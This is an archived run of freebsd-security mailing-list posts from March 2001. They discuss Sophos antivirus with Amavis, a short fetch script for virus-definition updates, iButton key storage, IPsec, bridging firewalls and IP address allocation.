--3MwIy2ne0vdjdPXF
Content-Type: application/pgp-signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6rpaFWry0BWjoQKURAhHYAKDNT5fwy+mGZASyFWcg6bRpppOYCQCbBpzj
oc4Yoanmtbf2MU7x9WFVbso=
=hrQ5
-----END PGP SIGNATURE-----
--3MwIy2ne0vdjdPXF--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 13:57:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13])
by hub.freebsd.org (Postfix) with ESMTP id EE38537B71D
for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 13:57:33 -0800 (PST)
(envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001)
id 10A505BF7; Tue, 13 Mar 2001 13:57:42 -0800 (PST)
Date: Tue, 13 Mar 2001 13:57:41 -0800
From: dannyman <dannyman@toldme.com>
To: James Wyatt <jwyatt@rwsystems.net>
Cc: Will Mitayai Keeso Rowe <mit@mitayai.net>,
freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
Message-ID: <20010313135741.I3500@dell.dannyland.org>
References: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net> <Pine.BSF.4.10.10103122000480.72725-100000@bsdie.rwsystems.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <Pine.BSF.4.10.10103122000480.72725-100000@bsdie.rwsystems.net>; from jwyatt@rwsystems.net on Mon, Mar 12, 2001 at 09:04:02PM -0600
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Mon, Mar 12, 2001 at 09:04:02PM -0600, James Wyatt wrote:
> I have an eval copy of a product that looks promising: Sohpos antivirus.
>
> http://www.sophos.com/products/antivirus/savunix.html
I have been using Amavis and Sophos together for a while now. I must say that
Sophos have been good to us.
[...]
> Updates are monthly CDs and urgent updates are available as downloads.
I have a cron that runs every five minutes to grab the latest identities from
their web site. We are very secure against even the trendy virii, and it is
kind of fun to respond to a ticket from a well-meaning user warning us of a
new virus that "we have been scanning for this virus since 9:30AM yesterday."
:)
If anyone wants the script, e-mail me.
> Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
> scan the Samba partitions for file infections. It handles uSoft Office
> products like Word(tm) docs and such.
It can open archives and stuff too. I haven't used Intercheck yet, but that
looks like a very clever idea - your Windows clients contact the unix server
for virus identity updates.
> Best of all, they support FreeBSD so we should support them, right? - Jy@
Amen. They seem pretty sucessfully multi-platform. Were they truly clever
they'd submit a port so you could eval their software. :)
-danny
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 14: 7:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193])
by hub.freebsd.org (Postfix) with ESMTP id A992F37B719
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 14:07:37 -0800 (PST)
(envelope-from adam@algroup.co.uk)
Received: from algroup.co.uk ([192.168.192.1]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id QAA09385; Tue, 13 Mar 2001 16:16:15 GMT
Message-ID: <3AAE4798.C7C457E4@algroup.co.uk>
Date: Tue, 13 Mar 2001 16:15:20 +0000
From: Adam Laurie <adam@algroup.co.uk>
X-Mailer: Mozilla 4.7 [en-gb] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: Poul-Henning Kamp <phk@critter.freebsd.dk>
Cc: Terje Elde <terje@thinksec.no>,
Daniel Hagan <dhagan@colltech.com>, freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development
References: <7857.984495569@critter>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Poul-Henning Kamp wrote:
>
> My share in this is mostly the monitoring gadgets with the 1wire
> products, but given working software I would probably put my pgp
> key somewhere more safe as well.
the iblab test programs provide enough functionality to do this... a
very simple setup is:
create a new pgp private key for your laptop. use it to encrypt your
"real" pgp keyring/ssh keys/whatever and copy the resulting file to the
ibutton. you only EVER use the new keypair for this purpose. when you
need to use your real key, you copy it back of the ibutton, onto
ramdisk, decrypt it, use it, blow away your ramdisk (all nicely wrapped
in a shellscript of course)...
this way, you can take your laptop and your ibutton on the road with
you... if you lose the ibutton it doesn't matter because it's encrypted
with a one-time throw away key that only exists on your laptop, which
you immediately delete. if you lose your laptop, you've lost a key that
was only ever used to encrypt something on your ibutton which you now
overwrite with a new one.
this assumes, of course, that you've stored your "real" original keys
somewhere *really* safe... deep underground, blast doors, bullet proof
glass, etc. etc... you know the kind of thing.... :)
cheers,
Adam
--
Adam Laurie Tel: +44 (20) 8742 0755
A.L. Digital Ltd. Fax: +44 (20) 8742 5995
Voysey House http://www.thebunker.net
Barley Mow Passage http://www.aldigital.co.uk
London W4 4GB mailto:adam@algroup.co.uk
UNITED KINGDOM PGP key on keyservers
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 14: 7:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193])
by hub.freebsd.org (Postfix) with ESMTP id 9771137B71A
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 14:07:39 -0800 (PST)
(envelope-from adam@algroup.co.uk)
Received: from algroup.co.uk ([192.168.192.1]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id OAA09186; Tue, 13 Mar 2001 14:20:05 GMT
Message-ID: <3AAE2C6C.D06A0E88@algroup.co.uk>
Date: Tue, 13 Mar 2001 14:19:24 +0000
From: Adam Laurie <adam@algroup.co.uk>
X-Mailer: Mozilla 4.7 [en-gb] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: Poul-Henning Kamp <phk@critter.freebsd.dk>
Cc: Daniel Hagan <dhagan@colltech.com>, freebsd-security@FreeBSD.ORG,
iblab@aldigital.co.uk
Subject: Re: iButton Development
References: <6940.984490034@critter>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Poul-Henning Kamp wrote:
>
> In message <3AADB1D3.C70E00C@colltech.com>, Daniel Hagan writes:
> >There was some discussion regarding iButtons in mid-Jan on this list.
> >I'm interested in getting one or more of these things to play with, with
> >the goal of:
>
> The best I can suggest you is that we rally all efforts
> around:
> http://anoncvs.aldigital.co.uk/iBLab/
>
we would certainly welcome any input and will incoporate any useful code
back into the project.
cheers,
Adam
--
Adam Laurie Tel: +44 (20) 8742 0755
A.L. Digital Ltd. Fax: +44 (20) 8742 5995
Voysey House http://www.thebunker.net
Barley Mow Passage http://www.aldigital.co.uk
London W4 4GB mailto:adam@algroup.co.uk
UNITED KINGDOM PGP key on keyservers
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 15:15:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13])
by hub.freebsd.org (Postfix) with ESMTP id 4628537B719
for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 15:15:04 -0800 (PST)
(envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001)
id A51315BF7; Tue, 13 Mar 2001 15:15:12 -0800 (PST)
Date: Tue, 13 Mar 2001 15:15:12 -0800
From: dannyman <dannyman@toldme.com>
To: freebsd-security@freebsd.org
Subject: Sophos "idefetch" script
Message-ID: <20010313151512.Q3500@dell.dannyland.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Wow, got three responses right away asking for my script to fetch updated IDE
files from Sophos' web site.
Which it turns out is seven lines of sh, and now thirty-some lines of Tellme
Open Source License. :)
http://www.dannyland.org/~dannyman/warez/idefetch
If you can make it better, please share. ;)
-danny
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 15:43:43 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13])
by hub.freebsd.org (Postfix) with ESMTP id E60C537B718
for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 15:43:41 -0800 (PST)
(envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001)
id DBA455BF7; Tue, 13 Mar 2001 15:43:49 -0800 (PST)
Date: Tue, 13 Mar 2001 15:43:49 -0800
From: dannyman <dannyman@toldme.com>
To: freebsd-security@freebsd.org
Subject: Re: Sophos "idefetch" script
Message-ID: <20010313154349.W3500@dell.dannyland.org>
References: <20010313151512.Q3500@dell.dannyland.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <20010313151512.Q3500@dell.dannyland.org>; from dannyman@toldme.com on Tue, Mar 13, 2001 at 03:15:12PM -0800
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Okay ...
So, I added a note about how fetch -m means "mirror" but the other important
thing to note is this is just a simple little brain-dead mirror script, and
the true magic comes from http://www.amavis.org/ so you can scan e-mail. ;)
-danny
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 16: 4: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
by hub.freebsd.org (Postfix) with ESMTP id 585B037B718
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 16:04:03 -0800 (PST)
(envelope-from des@ofug.org)
Received: (from des@localhost)
by flood.ping.uio.no (8.9.3/8.9.3) id BAA51503;
Wed, 14 Mar 2001 01:03:59 +0100 (CET)
(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
coincide with those of any organisation or company with
which I am or have been affiliated.
To: dannyman <dannyman@toldme.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos "idefetch" script
References: <20010313151512.Q3500@dell.dannyland.org>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 14 Mar 2001 01:03:58 +0100
In-Reply-To: dannyman's message of "Tue, 13 Mar 2001 15:15:12 -0800"
Message-ID: <xzpvgpdz05t.fsf@flood.ping.uio.no>
Lines: 17
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
dannyman <dannyman@toldme.com> writes:
> http://www.dannyland.org/~dannyman/warez/idefetch
>
> If you can make it better, please share. ;)
Try this on for size:
idesite="http://www.sophos.com/downloads/ide/"
idedir="/usr/local/sav"
fetch="/usr/bin/fetch"
${fetch} -q -o - "${idesite}list.txt" | cut -c 37- | while read d ; do
${fetch} -m -q -o ${idedir} "${idesite}${d}"
done
DES
--
Dag-Erling Smorgrav - des@ofug.org
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 16:10:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13])
by hub.freebsd.org (Postfix) with ESMTP id 59F8B37B718
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 16:10:09 -0800 (PST)
(envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001)
id E15865BF7; Tue, 13 Mar 2001 16:10:17 -0800 (PST)
Date: Tue, 13 Mar 2001 16:10:17 -0800
From: dannyman <dannyman@toldme.com>
To: Dag-Erling Smorgrav <des@ofug.org>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos "idefetch" script
Message-ID: <20010313161017.Z3500@dell.dannyland.org>
References: <20010313151512.Q3500@dell.dannyland.org> <xzpvgpdz05t.fsf@flood.ping.uio.no>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <xzpvgpdz05t.fsf@flood.ping.uio.no>; from des@ofug.org on Wed, Mar 14, 2001 at 01:03:58AM +0100
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Wed, Mar 14, 2001 at 01:03:58AM +0100, Dag-Erling Smorgrav wrote:
> dannyman <dannyman@toldme.com> writes:
> > http://www.dannyland.org/~dannyman/warez/idefetch
> >
> > If you can make it better, please share. ;)
>
> Try this on for size:
>
> idesite="http://www.sophos.com/downloads/ide/"
> idedir="/usr/local/sav"
> fetch="/usr/bin/fetch"
> ${fetch} -q -o - "${idesite}list.txt" | cut -c 37- | while read d ; do
> ${fetch} -m -q -o ${idedir} "${idesite}${d}"
> done
DES:
Is this addendum to the script okay by you? ;)
# >>>>>> SNIP HERE IF YOU ARE 31337 <<<<<<
# If you want, use this from Dag-Erling Smorgrav <des@ofug.org>
# (You can use the below without including the Tellme license ;)
#Try this on for size:
#
#idesite="http://www.sophos.com/downloads/ide/"
#idedir="/usr/local/sav"
#fetch="/usr/bin/fetch"
#${fetch} -q -o - "${idesite}list.txt" | cut -c 37- | while read d ; do
# ${fetch} -m -q -o ${idedir} "${idesite}${d}"
#done
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 16:40:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
by hub.freebsd.org (Postfix) with ESMTP id 9161E37B71B
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 16:40:20 -0800 (PST)
(envelope-from des@ofug.org)
Received: (from des@localhost)
by flood.ping.uio.no (8.9.3/8.9.3) id BAA51694;
Wed, 14 Mar 2001 01:40:16 +0100 (CET)
(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
coincide with those of any organisation or company with
which I am or have been affiliated.
To: dannyman <dannyman@toldme.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos "idefetch" script
References: <20010313151512.Q3500@dell.dannyland.org> <xzpvgpdz05t.fsf@flood.ping.uio.no> <20010313161017.Z3500@dell.dannyland.org>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 14 Mar 2001 01:40:15 +0100
In-Reply-To: dannyman's message of "Tue, 13 Mar 2001 16:10:17 -0800"
Message-ID: <xzpr901yyhc.fsf@flood.ping.uio.no>
Lines: 25
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
dannyman <dannyman@toldme.com> writes:
> Is this addendum to the script okay by you? ;)
Umm, the idea was actually to suggest an improvement on your own
script. If you don't like it, just ignore it.
1) it's conventional to use lowercase names for variables internal to
the script, and reserve uppercase names for variables passed from
the shell.
2) you should always take care to wrap variable references in double
quotes
3) you shouldn't redirect fetch's stderr to /dev/null, use -q to hide
the status messages
4) your for loop will break if one of the IDEs' name contains funny
characters; my while loop won't
5) you don't need to cd to ${idedir}, you can ask fetch to put the
files there for you - though that's mostly a matter of taste
DES
--
Dag-Erling Smorgrav - des@ofug.org
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 16:54:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from dell.dannyland.org (dell.dannyland.org [64.81.36.13])
by hub.freebsd.org (Postfix) with ESMTP id 36C6137B718
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 16:54:26 -0800 (PST)
(envelope-from dannyman@toldme.com)
Received: by dell.dannyland.org (Postfix, from userid 1001)
id D262B5BF7; Tue, 13 Mar 2001 16:54:34 -0800 (PST)
Date: Tue, 13 Mar 2001 16:54:34 -0800
From: dannyman <dannyman@toldme.com>
To: Dag-Erling Smorgrav <des@ofug.org>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos "idefetch" script
Message-ID: <20010313165434.B3500@dell.dannyland.org>
References: <20010313151512.Q3500@dell.dannyland.org> <xzpvgpdz05t.fsf@flood.ping.uio.no> <20010313161017.Z3500@dell.dannyland.org> <xzpr901yyhc.fsf@flood.ping.uio.no>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <xzpr901yyhc.fsf@flood.ping.uio.no>; from des@ofug.org on Wed, Mar 14, 2001 at 01:40:15AM +0100
X-Loop: djhoward@uiuc.edu
X-URL: http://www.dannyland.org/~dannyman/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Wed, Mar 14, 2001 at 01:40:15AM +0100, Dag-Erling Smorgrav wrote:
> dannyman <dannyman@toldme.com> writes:
> > Is this addendum to the script okay by you? ;)
>
> Umm, the idea was actually to suggest an improvement on your own
> script. If you don't like it, just ignore it.
[...]
Ehhh ... great points that I may use in my life. I just like to share enough
rope to hang oneself. I try to keep the fetch arguments simple for
portability to non-FreeBSD. For a simple for loop, things started getting
silly the moment I slapped my company's license on there. And I used the
uppercase so some random person checking out the script would see "oh ... I
change THAT variable." (Like a #define or something in a Makefile.)
I put your version at the bottom as the easy, lightweight, not 40 lines of
commentary and license version, as the stuff above, as noted, has gotten
silly, and just to make it absolutely clear, that everything we ever need in
life, can just be finished with with the right six lines of shell script. (Or
one well-formed wget command, but I digress.)
I hope everyone is happily implementing their respective solutions though. :)
Thanks,
-danny
--
http://dannyman.toldme.com/
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 18:36: 5 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cs4.cs.ait.ac.th (cs4.cs.ait.ac.th [192.41.170.16])
by hub.freebsd.org (Postfix) with ESMTP id 269E437B72A
for <security@FreeBSD.ORG>; Tue, 13 Mar 2001 18:35:55 -0800 (PST)
(envelope-from Olivier.Nicole@ait.ac.th)
Received: from bazooka.cs.ait.ac.th (on@bazooka.cs.ait.ac.th [192.41.170.2])
by cs4.cs.ait.ac.th (8.9.3/8.9.3) with ESMTP id JAA25986;
Wed, 14 Mar 2001 09:35:38 +0700 (GMT+0700)
From: Olivier Nicole <Olivier.Nicole@ait.ac.th>
Received: (from on@localhost)
by bazooka.cs.ait.ac.th (8.8.5/8.8.5) id JAA25550;
Wed, 14 Mar 2001 09:35:46 +0700 (ICT)
Date: Wed, 14 Mar 2001 09:35:46 +0700 (ICT)
Message-Id: <200103140235.JAA25550@bazooka.cs.ait.ac.th>
To: lee@kechara.net
Cc: security@FreeBSD.ORG
In-reply-to: <200103131841.SAA10089@mailgate.kechara.net> (message from Lee Smallbone on Tue, 13 Mar 2001 17:35:00 -0000)
Subject: Re: [OT?] - Central point router
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Hi Lee,
Given than you may have to consider renumbering of the servers, and
that you could add a switch behind the FreeBSD router box, it is
pretty simple.
A PII 500, with 128 MB ram and 2 GB hardisk (where to find that small
disk) can do the trick.
If your LAN is only 10M, then a P100 would be enough (I had been
operating one for years, upgraded to PIII when we changed the LAN to
100M).
You may consider running gated or zebra, to the routing is limited and
static could do.
It is mainly problem of setting up the routing (which does not pertain
to this list) and opening few ports on the firewall.
One alternative solution read recently is to use DUMMY interface on
FreeBSD that allows to set-up a machine that has NO IP address (it is
like a sort of HUB) and still a firewall can be configured on it (see
mail archive less than 5 days ago). That way you avoid routing
problems and I beleive the machine is even more secure as it is
invisible from Internet. Of course you need a switch to serve your 3
servers.
Olivier
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 20:43:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61])
by hub.freebsd.org (Postfix) with ESMTP id 36FAC37B719
for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 20:43:50 -0800 (PST)
(envelope-from jomor@ahpcns.com)
Received: from ahpcns.com (localhost [127.0.0.1])
by shorty.ahpcns.com (Postfix) with ESMTP id 2958A3A715
for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 22:43:47 -0600 (CST)
Message-ID: <3AAEF702.9AC2715B@ahpcns.com>
Date: Tue, 13 Mar 2001 22:43:46 -0600
From: jomor <jomor@ahpcns.com>
Organization: ahpcns
X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: IPSEC tunnel without gif?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
I've been setting up a VPN with tunnel mode IPSEC and things are going
OK so far but in searching the list archives, I've found some stuff that
seems to imply that gif tunnels are not needed for tunnel mode. Is this
true? I've only gotten it to work by pre-configuring the gif tunnel, but
now I'm not sure if I have true "tunnel mode IPSEC" or "transport mode
IPSEC" applied to an "IP-ENCAP" tunnel such as that suggested by the
X-bone project.
seeking enlightenment ...jgm
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 20:52:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19])
by hub.freebsd.org (Postfix) with ESMTP id 3E62537B719
for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 20:52:15 -0800 (PST)
(envelope-from durham@w2xo.pgh.pa.us)
Received: from shazam (shazam [192.168.5.3])
by w2xo.pgh.pa.us (8.11.2/8.9.3) with ESMTP id f2E4pcq41853
for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 04:51:39 GMT
(envelope-from durham@w2xo.pgh.pa.us)
Date: Tue, 13 Mar 2001 23:54:01 -0500 (EST)
From: Jim Durham <durham@w2xo.pgh.pa.us>
X-Sender: durham@shazam.int
To: freebsd-security@freebsd.org
Subject: Sophos and Virus return mail
Message-ID: <Pine.BSF.4.21.0103132338550.27904-100000@shazam.int>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Great discussion going on about Sophos and Amavis!
This may be something I'm missing, but there are several
virii that apparently send no "envelope from" address when
they generate virus mail. One that comes to mind is the
stupid "Snow White" thing.
I went through the Amavis scan script and I see that if
there is no "envelope from" address, it punts and sends
the warning to "MAILER-DAEMON". This means you get a
bazillion of these messages every day (We seem to have
employees who appear in the address books of people with
this virus!). Also, the person with the virus does not
get the warning mail.
I thought of rewriting the script to use the "From: " address
to reply. I think that would usually work, but I'm not sure
that address always appears either.
Anyone done anything with this?
Thanks,
Jim Durham
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 20:57: 6 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.xmission.com (mail.xmission.com [198.60.22.22])
by hub.freebsd.org (Postfix) with ESMTP id DCA1F37B71A
for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 20:57:04 -0800 (PST)
(envelope-from cookfire@xmission.com)
Received: from [166.70.183.163] (helo=cook)
by mail.xmission.com with smtp (Exim 3.12 #1)
id 14d3LM-0003NU-00
for freebsd-security@freebsd.org; Tue, 13 Mar 2001 21:57:04 -0700
Reply-To: <cookfire@xmission.com>
From: "Craig Chaney" <cookfire@xmission.com>
To: <freebsd-security@freebsd.org>
Subject: Bridging only 2 interfaces???
Date: Tue, 13 Mar 2001 21:57:35 -0700
Message-ID: <001501c0ac43$49dcfe60$a3b746a6@cook>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
I have set up a bridging firewall that has 3 interfaces. One of the
interfaces is the protected side of the machine, one is the internet side of
the machine, and the third is an interface in to my local network for
management purposes. Is it possible to set up the machine to bridge just the
interfaces not connected to the local network? If so how?
Thank you
--Craig
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 22:37:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15])
by hub.freebsd.org (Postfix) with ESMTP
id 164B237B71A; Tue, 13 Mar 2001 22:37:48 -0800 (PST)
(envelope-from tedm@toybox.placo.com)
Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154])
by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2E6ZDN22442;
Tue, 13 Mar 2001 22:35:13 -0800 (PST)
(envelope-from tedm@toybox.placo.com)
From: "Ted Mittelstaedt" <tedm@toybox.placo.com>
To: "Bob Van Valzah" <Bob@Talarian.Com>
Cc: "pW" <packetwhore@stargate.net>, <FreeBSD-Security@FreeBSD.ORG>,
<FreeBSD-Questions@FreeBSD.ORG>
Subject: RE: Racoon Problem & Cisco Tunnel
Date: Tue, 13 Mar 2001 22:35:12 -0800
Message-ID: <003d01c0ac50$ec379280$1401a8c0@tedm.placo.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
Importance: Normal
In-Reply-To: <3AAE24E6.9080802@Talarian.Com>
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Thanks!
It's not really a religious war, because there's valid reasons
to move to IPv6 and I think it's obvious that ultimately the
Internet is going to have to go there. But, what the engineers
don't understand is that this is a political problem, not a
technical problem. They just see it like the Post Office sees
it when they need a new zip code. What they always forget is
that there's ways to twist the arms of people that are address
space hogs that will force those addresses to be upchucked - thus
the "imminent shortage" magically disappears for another 6
months until the next person's arm needs to be twisted. And,
there's an incredible number of arms out there that can be twisted.
Take some of those large corporations, like SquishySoft, that
have entire class A's assigned to them, but firewall the entire
address space off from the public Internet, and only allow
incoming connections to perhaps 100 of them. Would you like
to be the CEO of Squishy when the papers start rolling the story
of how this company's completely unjustified hanging-on of this
block is preventing another 16 million people from being brought
on to the Internet?
I agree with you on ISP's needing to hand out public numbers.
The ISP I work for hands them out with every account, either
work or home, for no extra charge. As long as you know what
your doing when you put together your network it's not a problem
for the ISP. I've even been known to cut the occasional /29 subnet
to people that had justification for it. I only draw the line at
the people that want a dozen numbers in the DSL bridge itself and
are too cheap to buy a router. But, going beyond a /29 for a
small company - that's a different story, and we make people jump
through hoops before doing it.
Ted Mittelstaedt tedm@toybox.placo.com
Author of: The FreeBSD Corporate Networker's Guide
Book website: http://www.freebsd-corp-net-guide.com
-----Original Message-----
From: Bob Van Valzah [mailto:Bob@Talarian.Com]
Sent: Tuesday, March 13, 2001 5:47 AM
To: Ted Mittelstaedt
Cc: pW; FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel
Ted, Loved the book--can't wait for the movie!
This is a religious war that's been fought many times before. Since my last
answer was too flip, I'll clarify my point of view. IPv4, IPv6, and NAT are
all just tools that I have to apply with "business sense." NAT's not
inherently evil, nor is IPv6. Their sensibility will change over time and
depend upon the application.
If I were shopping for DSL for "my mom," I wouldn't care if she got a public
address or not. Reliability and good support (as a "little guy" can more
often provide) would be more important.
But when I'm shopping for DSL for a work-from-home, multicast protocol stack
developer, a public address is a requirement. In fact, it's something I'll
pay extra to get. For my business, IPSec is important and hence having at
least one public address is important.
My protocol developers have a few LANs at home and we happily use NAT there.
I wouldn't pay extra to get enough address space to put public addresses on
all their home lab machines.
